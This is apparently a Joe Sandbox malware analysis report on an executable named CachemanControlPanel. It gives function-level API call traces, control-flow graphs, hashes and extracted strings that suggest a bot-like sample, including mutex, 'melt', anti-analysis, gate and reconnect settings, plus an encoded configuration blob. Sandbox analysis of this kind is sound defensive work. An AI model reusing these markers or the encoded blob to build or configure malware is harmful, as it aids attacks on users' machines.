                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Internet$CloseHandle$HeapHttpRequestValue$AllocateByteCharErrorLastMultiOpenWide$AllocConnectFileHeadersOptionReadSendwcslen
                                                        • String ID: /PC/$/PT/$/WS/$Content-Type: application/x-www-form-urlencoded$GET$P$POST$https
                                                        • API String ID: 3987038017-4095740890
                                                        • Opcode ID: 8f01de06e087831ebc89afc92efd8858ca6f2ca5fac2ab1e332c51745d289c37
                                                        • Instruction ID: 3c5e54382bbfbad3edbda9348b312964ee9a1374b3812383d6912d1de4640607
                                                        • Opcode Fuzzy Hash: 8f01de06e087831ebc89afc92efd8858ca6f2ca5fac2ab1e332c51745d289c37
                                                        • Instruction Fuzzy Hash: BEB13DB5108300BED601BB21DD42E7F7AAAEFC4718F50893FB190A51A2DE3DCD91961E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 764 412c47-412c64 LoadLibraryW 765 412c66-412c77 GetProcAddress 764->765 766 412cae-412cbd LoadLibraryW 764->766 767 412ca7-412ca8 FreeLibrary 765->767 768 412c79-412c98 memset 765->768 769 412ce7-412cef 766->769 770 412cbf-412ccd GetProcAddress 766->770 767->766 768->767 774 412c9a-412ca5 768->774 771 412ce0-412ce1 FreeLibrary 770->771 772 412ccf-412cd3 770->772 771->769 772->771 776 412cd5-412cdb 772->776 774->767 776->771 777 412cdd-412cdf 776->777 777->771
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(COMCTL32.DLL,?,?,?,?,?,?,?,?,00412FCB), ref: 00412C5A
                                                        • GetProcAddress.KERNEL32(00000000,DllGetVersion), ref: 00412C6C
                                                        • memset.MSVCRT ref: 00412C80
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,00412FCB), ref: 00412CA8
                                                        • LoadLibraryW.KERNEL32(uxtheme.dll,?,?,?,?,?,?,?,?,00412FCB), ref: 00412CB3
                                                        • GetProcAddress.KERNEL32(00000000,IsAppThemed), ref: 00412CC5
                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,00412FCB), ref: 00412CE1
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Library$AddressFreeLoadProc$memset
                                                        • String ID: COMCTL32.DLL$DllGetVersion$IsAppThemed$uxtheme.dll
                                                        • API String ID: 4277437538-2634860346
                                                        • Opcode ID: 6b6119feab4a63d868dfc7fdf57736a4da224e63bb35b5b60268a68276a81a9f
                                                        • Instruction ID: 7519cd42efedb32353cb58b9a573c1bb66bbe77f84aa657e02aa22e0815e2163
                                                        • Opcode Fuzzy Hash: 6b6119feab4a63d868dfc7fdf57736a4da224e63bb35b5b60268a68276a81a9f
                                                        • Instruction Fuzzy Hash: B411C6317003166BD7106BF69E496EFBFACEB40741B501133FA05E2141EBB8C8548AE8
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 401000-4012a4 memset GetModuleHandleW HeapCreate call 418520 call 417b67 call 4176c0 call 416150 call 4140ac call 413950 call 412f2d call 4122af call 411d40 call 411b7f call 4117d6 call 40cae0 call 40befc call 40aae7 call 40a9c2 call 4117ff call 418570 * 2 call 419150 call 4176e0 call 4185b0 call 418570 * 4 call 417730 call 40a212 call 416400 call 4185b0 call 418570 * 2 call 417730 call 4185b0 call 418570 call 404acc call 4185b0 call 418570 call 40548e call 4185b0 call 418570 call 40548e call 4185b0 call 418570 call 40548e call 4185b0 call 418570 * 2 call 40ab16 call 418640 * 2 call 4185b0 call 418570 * 2 call 40548e call 40a212 call 416490 call 40a230 call 418570 call 418640 * 2 call 4185b0 123 4012a6-4012b0 0->123 124 4012dc-401326 call 418570 call 408bb3 call 4186a0 call 418570 call 418640 * 2 call 40a240 * 2 call 40a250 0->124 126 4012b2-4012bd 123->126 149 401397 124->149 150 401328-40138e call 418570 * 3 call 408bb3 call 40a212 call 40c723 call 4186a0 call 418570 call 418640 * 2 call 40a240 * 2 call 40a250 124->150 126->124 128 4012bf-4012da call 405a53 call 40c4f3 126->128 128->124 128->126 151 401399-40139b 149->151 150->149 241 401390-401395 150->241 153 4013a1-4013e3 call 418570 call 40548e call 4185b0 CreateMutexW 151->153 154 40192c-401971 call 418570 * 2 call 40548e call 40a212 call 416490 call 40a230 151->154 175 4013f2-4013f7 153->175 176 4013e5-4013ee GetLastError 153->176 201 401973-401975 154->201 202 401977 154->202 181 4013fb-4013fd 175->181 176->175 180 4013f0-4013f9 176->180 180->181 182 401404-401449 call 418570 * 2 call 40548e call 40a212 call 416490 call 40a230 181->182 183 4013ff 181->183 229 401462-4014b5 call 405b17 call 405f29 call 418570 call 40548e call 4185b0 182->229 230 40144b-40145d call 418570 call 408240 call 4185b0 182->230 187 401c1c-401c36 ExitProcess call 418550 HeapDestroy ExitProcess 183->187 205 40197c-40197e 201->205 202->205 208 401980 205->208 209 401985-401ab0 call 418570 call 418640 * 4 call 4185b0 call 418570 * 2 call 418640 * 2 call 40a212 call 40c735 call 40a230 call 40c4f3 call 418570 * 2 call 418640 * 2 call 40a212 call 40c7b5 call 40a230 call 418570 * 6 call 40ab53 call 40a212 call 40c723 call 40a212 call 416760 call 4186a0 call 40a240 call 40a250 205->209 208->209 422 401ab6-401b4e call 418570 * 8 call 40ab53 call 40a212 call 40c723 call 40a212 call 4167d0 call 40a212 call 416400 call 4185b0 PathFileExistsW 209->422 423 401b6e-401c0e call 418570 * 3 call 40ab53 call 40a212 call 40c7c6 call 40a230 call 40c4f3 call 418570 * 2 call 40548e call 40a212 call 416490 call 40a230 call 40abf2 209->423 261 4014b7-4014c4 229->261 230->229 241->151 262 4016e2-401727 call 418570 * 2 call 40548e call 40a212 call 416490 call 40a230 261->262 263 4014ca-40163f call 418570 * 3 call 418640 call 418570 * 2 call 4165d0 call 418640 call 4186a0 call 40a212 call 40548e call 40a212 call 405303 call 4185b0 call 418570 * 2 call 418640 call 418570 * 2 call 4165d0 call 418640 call 4186a0 call 40a212 call 40548e call 4185b0 call 418570 * 2 call 418640 call 418570 * 2 call 4165d0 call 418640 call 4186a0 call 40a212 call 40548e call 4185b0 call 40705d 261->263 302 401739-401749 call 416730 262->302 303 401729-401734 call 403e49 262->303 515 401641-40169b call 418570 call 418640 call 4185b0 call 418570 call 418640 call 4185b0 call 418570 call 418640 call 4185b0 263->515 516 40169d-4016d1 call 416490 call 40a000 call 40c4f3 263->516 314 401750-401927 call 418570 call 40548e call 4185b0 call 418570 call 40548e call 4185b0 call 418570 * 2 call 40548e call 40a212 call 416490 call 40a230 call 40a000 call 418570 * 2 call 40548e call 40a212 call 416490 call 40a230 call 40a000 call 418570 * 2 call 40548e call 40a212 call 416490 call 40a230 call 40a000 call 418570 * 2 call 40548e call 40a212 call 416490 call 40a230 call 40a000 call 404ddb 302->314 315 40174b 302->315 303->302 314->187 315->187 562 401b50-401b52 422->562 563 401b54 422->563 555 401c10-401c15 call 4024a7 423->555 556 401c1a 423->556 515->262 544 4016d6-4016dc 516->544 544->261 544->262 555->556 556->187 566 401b59-401b5b 562->566 563->566 566->423 569 401b5d-401b69 call 409185 566->569 569->423
                                                        APIs
                                                        • memset.MSVCRT ref: 0040100F
                                                        • GetModuleHandleW.KERNEL32(00000000), ref: 0040101C
                                                        • HeapCreate.KERNEL32(00000000,00001000,00000000,00000000), ref: 00401035
                                                          • Part of subcall function 00418520: HeapCreate.KERNEL32(00000000,00001000,00000000,?,0040104E,00000000,00001000,00000000,00000000), ref: 0041852C
                                                          • Part of subcall function 00418520: TlsAlloc.KERNEL32(?,0040104E,00000000,00001000,00000000,00000000), ref: 00418537
                                                          • Part of subcall function 00417B67: CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417B85
                                                          • Part of subcall function 00417B67: GetDeviceCaps.GDI32(00000000,0000005A), ref: 00417B94
                                                          • Part of subcall function 00417B67: DeleteDC.GDI32(00000000), ref: 00417BA0
                                                          • Part of subcall function 004176C0: HeapCreate.KERNEL32(00000000,00001000,00000000,00401058,00000000,00001000,00000000,00000000), ref: 004176C9
                                                          • Part of subcall function 00412F2D: LoadLibraryW.KERNEL32(msimg32.dll), ref: 00412F3B
                                                          • Part of subcall function 00412F2D: GetProcAddress.KERNEL32(00000000,AlphaBlend), ref: 00412F50
                                                          • Part of subcall function 00412F2D: GetVersionExW.KERNEL32(?), ref: 00412F76
                                                          • Part of subcall function 00411B7F: TlsAlloc.KERNEL32(0040107B,00000000,00001000,00000000,00000000), ref: 00411B7F
                                                          • Part of subcall function 0040AAE7: InitializeCriticalSection.KERNEL32(004341B8,00000004,00000004,0040AABA,00000010,00000000,00000000,0040108F,00000000,00001000,00000000,00000000), ref: 0040AB0F
                                                          • Part of subcall function 0040A9C2: InitializeCriticalSection.KERNEL32(00434190,00401094,00000000,00001000,00000000,00000000), ref: 0040A9C7
                                                          • Part of subcall function 004117FF: HeapAlloc.KERNEL32(00000000,004338C4,?,00430D24,?,?,?,004010B2,0000000C,00000001,00000007,00430D24,004338DC,00000000,00001000,00000000), ref: 0041182F
                                                          • Part of subcall function 004117FF: memset.MSVCRT ref: 0041186A
                                                          • Part of subcall function 00418570: GetLastError.KERNEL32(00001000,00000000,00000000), ref: 00418576
                                                          • Part of subcall function 00418570: TlsGetValue.KERNEL32(00000022), ref: 00418585
                                                          • Part of subcall function 00418570: SetLastError.KERNEL32(?), ref: 0041859B
                                                          • Part of subcall function 004176E0: memcpy.MSVCRT ref: 00417717
                                                          • Part of subcall function 004185B0: TlsGetValue.KERNEL32(00000022,00000000,00000000), ref: 004185BC
                                                          • Part of subcall function 004185B0: RtlAllocateHeap.NTDLL(02A80000,00000000,?), ref: 004185E9
                                                          • Part of subcall function 0040A212: TlsGetValue.KERNEL32(00000000,0040111B,0043101C,FFFFFFFF,00000002,00000000,00000000,00000001,00000020,00000000,00000000,0043383C,00000000,00000000,00000000,0000000C), ref: 0040A219
                                                          • Part of subcall function 004185B0: HeapReAlloc.KERNEL32(02A80000,00000000,?,?), ref: 0041860C
                                                          • Part of subcall function 00417730: MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,0043101C,?,?,?,00401116,0043101C,FFFFFFFF,00000002,00000000,00000000), ref: 00417812
                                                          • Part of subcall function 00417730: MultiByteToWideChar.KERNEL32(00000000,00000000,00000001,00000000,00000000,00000001,00000000,00000001,?,?,?,00401116,0043101C,FFFFFFFF,00000002,00000000), ref: 00417832
                                                          • Part of subcall function 0040AB16: GetEnvironmentVariableW.KERNEL32(004338DC,00000000,00000000,?,?,00401215,00000000,00000000,0043387C,installation,name,00000000,0043389C,installation,subfolder,00000000), ref: 0040AB20
                                                          • Part of subcall function 0040AB16: GetEnvironmentVariableW.KERNEL32(004338DC,00000000,00000001,00000000,00000000,?,?,00401215,00000000,00000000,0043387C,installation,name,00000000,0043389C,installation), ref: 0040AB42
                                                          • Part of subcall function 00418640: wcslen.MSVCRT ref: 00418657
                                                        • CreateMutexW.KERNEL32(00000000,00000001,00433878,installation,mutex,00000000,00430236,02A804F8,00000000,00000001,00000000,00433874,\ref.conf,02A804F8,00000000,installation), ref: 004013DA
                                                        • GetLastError.KERNEL32(00000000,00000001,00433878,installation,mutex,00000000,00430236,02A804F8,00000000,00000001,00000000,00433874,\ref.conf,02A804F8,00000000,installation), ref: 004013E5
                                                        • ExitProcess.KERNEL32(00000000,00430024,00000002,installation,melt,00000000,00000000,00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000006), ref: 00401C21
                                                        • HeapDestroy.KERNEL32(00000000,00430024,00000002,installation,melt,00000000,00000000,00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000006), ref: 00401C31
                                                        • ExitProcess.KERNEL32(00000000,00430024,00000002,installation,melt,00000000,00000000,00000BB8,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000006), ref: 00401C36
                                                          • Part of subcall function 00405A53: LoadLibraryW.KERNEL32(.dll,00000000,00000000,00000000,00000000,?,004012CA,00433874,\ref.conf,02A804F8,00000000,installation,antis,00000000,00000000,00433880), ref: 00405AF1
                                                          • Part of subcall function 0040C4F3: timeBeginPeriod.WINMM(00000001,00401A08,00000BB8,00430236,02A804F8,00000000,00000000,00433844,.exe,02A804C0,00430236,02A804F8,00000000,installation,setup,00000000), ref: 0040C4FE
                                                          • Part of subcall function 00403E49: IsUserAdmin.SETUPAPI ref: 00403E5E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: Heap$Create$Alloc$ErrorLastValue$ByteCharCriticalEnvironmentExitInitializeLibraryLoadMultiProcessSectionVariableWidememset$AddressAdminAllocateBeginCapsDeleteDestroyDeviceHandleModuleMutexPeriodProcUserVersionmemcpytimewcslen
                                                        • String ID: .exe$0C$Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY$\ref.conf$agent[$antis$cache-$client$connect$connection_key$gate$group$installation$key[$melt$mutex$name$path$plugins$process$reconnect$reports$rip$setup$startup$subfolder$tag$timers$url[$user_agent
                                                        • API String ID: 1354275910-1173278696
                                                        • Opcode ID: 72fb5140bed1084b1f6b89e3f2106b886fd02423d9df48959d16b229a2a8ed71
                                                        • Instruction ID: 5e6db7f5274bafce55e7ce43137c992fa097692b6d2be9716319cb4b14df053e
                                                        • Opcode Fuzzy Hash: 72fb5140bed1084b1f6b89e3f2106b886fd02423d9df48959d16b229a2a8ed71
                                                        • Instruction Fuzzy Hash: CB4207B96402007EE2447B766D82ABE36EEDBD4719F10D93FB400A51A2DD3C8DD1662E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 778 412f2d-412f48 LoadLibraryW 779 412f5b-412f7e GetVersionExW 778->779 780 412f4a-412f56 GetProcAddress 778->780 781 412f80-412f87 779->781 782 412fbd 779->782 780->779 783 412f92-412f99 781->783 784 412f89-412f90 781->784 785 412fc2-412fc4 782->785 783->782 787 412f9b-412fa2 783->787 786 412fd5-412fd8 784->786 785->786 788 412fc6 call 412c47 785->788 787->784 789 412fa4 787->789 792 412fcb-412fcf 788->792 789->782 791 412fa6-412fbb 789->791 791->785 792->786
                                                        APIs
                                                        • LoadLibraryW.KERNEL32(msimg32.dll), ref: 00412F3B
                                                        • GetProcAddress.KERNEL32(00000000,AlphaBlend), ref: 00412F50
                                                        • GetVersionExW.KERNEL32(?), ref: 00412F76
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: AddressLibraryLoadProcVersion
                                                        • String ID: AlphaBlend$msimg32.dll
                                                        • API String ID: 2685220120-3639726679
                                                        • Opcode ID: 160743ed2209961bf497b8ab71eab2eccffd13f21afd8dfd674947a525f838dd
                                                        • Instruction ID: 06276db0fc9ba84a4aad0d4ea3832d61d8aa26a30f8f94dcaa6d2cfa87493b4a
                                                        • Opcode Fuzzy Hash: 160743ed2209961bf497b8ab71eab2eccffd13f21afd8dfd674947a525f838dd
                                                        • Instruction Fuzzy Hash: 9E01C071B102198BCB288F20EF897D573F8A714725F1011B6E608D2290E7B894D9AE6E
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 793 417b67-417b8f call 417ea7 CreateDCW 796 417b91-417ba7 GetDeviceCaps DeleteDC 793->796 797 417ba8-417bb3 793->797
                                                        APIs
                                                          • Part of subcall function 00417EA7: HeapAlloc.KERNEL32(00000008,00000038,?,00417B76,00000004,00000010,00417BB4,?,00401053,00000000,00001000,00000000,00000000), ref: 00417EB2
                                                          • Part of subcall function 00417EA7: HeapAlloc.KERNEL32(00000008,00001000,?,00417B76,00000004,00000010,00417BB4,?,00401053,00000000,00001000,00000000), ref: 00417EE1
                                                          • Part of subcall function 00417EA7: InitializeCriticalSection.KERNEL32(00000020,?,00417B76,00000004,00000010,00417BB4,?,00401053,00000000,00001000,00000000), ref: 00417EEE
                                                        • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417B85
                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00417B94
                                                        • DeleteDC.GDI32(00000000), ref: 00417BA0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: AllocHeap$CapsCreateCriticalDeleteDeviceInitializeSection
                                                        • String ID: DISPLAY
                                                        • API String ID: 2433457814-865373369
                                                        • Opcode ID: 9423453d03031f6c30412892c8207754e845483fbef31712679cb496fa469a08
                                                        • Instruction ID: 1231037f6495305c5889d530bfa287352df8421bde6d6d0a49fd9f844b838046
                                                        • Opcode Fuzzy Hash: 9423453d03031f6c30412892c8207754e845483fbef31712679cb496fa469a08
                                                        • Instruction Fuzzy Hash: A9E048B16852216FD310AB61BC09FE73768FB44746F0151A6B905E65D0C7F458805AAD
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 798 4187d0-4187d8 799 418817-41881a 798->799 800 4187da-418812 wcslen RtlAllocateHeap call 418a90 798->800 800->799
                                                        APIs
                                                        • wcslen.MSVCRT ref: 004187DE
                                                        • RtlAllocateHeap.NTDLL(02A80000,00000000,?,?,00000000), ref: 004187F9
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 004187D0
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: AllocateHeapwcslen
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 1345907364-3176450862
                                                        • Opcode ID: b3562ecaac1de147926a6ea2a0af9cd12d139f88880aca86f773959f1819e59e
                                                        • Instruction ID: 8771bba1796b14abd35d22a7a254b7e906f7b953320745c81cae72fe20eede13
                                                        • Opcode Fuzzy Hash: b3562ecaac1de147926a6ea2a0af9cd12d139f88880aca86f773959f1819e59e
                                                        • Instruction Fuzzy Hash: 88F05EB5A00208FFCB04EFA4C844E9A73B8EF88318F10C15DF9088B340DA75EA01CB94
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 802 418550-41856d HeapDestroy TlsFree
                                                        APIs
                                                        • HeapDestroy.KERNELBASE(02A80000,Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY,00401C2B,00000000,00430024,00000002,installation,melt,00000000,00000000,00000BB8,00000000,00000000,00000000,00000000,00000000), ref: 00418559
                                                        • TlsFree.KERNEL32(00000022), ref: 00418566
                                                        Strings
                                                        • Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY, xrefs: 00418550
                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.463581366.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.463559227.0000000000400000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.463853572.0000000000438000.00000080.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465100835.0000000000667000.00000040.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465125871.0000000000669000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465184420.0000000000674000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465472418.00000000006E2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465481211.00000000006E6000.00000008.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465509927.00000000006F2000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465516678.00000000006F4000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465534688.00000000006F9000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000002.00000002.465552892.00000000006FD000.00000002.00020000.sdmp Download File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_CachemanControlPanel.jbxd
                                                        Similarity
                                                        • API ID: DestroyFreeHeap
                                                        • String ID: Ek6bHA/CQopuNheX5LWBQA9gqDaVyrZ8oE2Ks8+o52Tq5oiyZ0h5HAiYzDRgIxRVGucC0CXTjg9nc7l7HnoYlTGGI+srb+Cf8cixyJaRyDTbhC9O7L5nj8M8ugVbGjo8scSc4YelMSbe8kH21DZdW//C4qxYv07dUftYjY1c60Nn00IuatNP3eFff2HsVH1XhEiQMZ+Cm2RsaYYn0wnP4eAhaUVOm/cpWmbN993FUHBUKYLXsglXyMIHliUFA263hNfY
                                                        • API String ID: 3293292866-3176450862
                                                        • Opcode ID: 8b00878808a95b931a5506806f90fbc5b3ddde3ae783f722fb87c20c729aa98d
                                                        • Instruction ID: c9f893ddf158d9eedf30ebc796fc552c767cc27477c09fe34e3ed93c32061efd
                                                        • Opcode Fuzzy Hash: 8b00878808a95b931a5506806f90fbc5b3ddde3ae783f722fb87c20c729aa98d
                                                        • Instruction Fuzzy Hash: DDC04C75615205DBC60CABA4FF4885B77ACA7886017403565B60583220CAB5F400CB6C
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
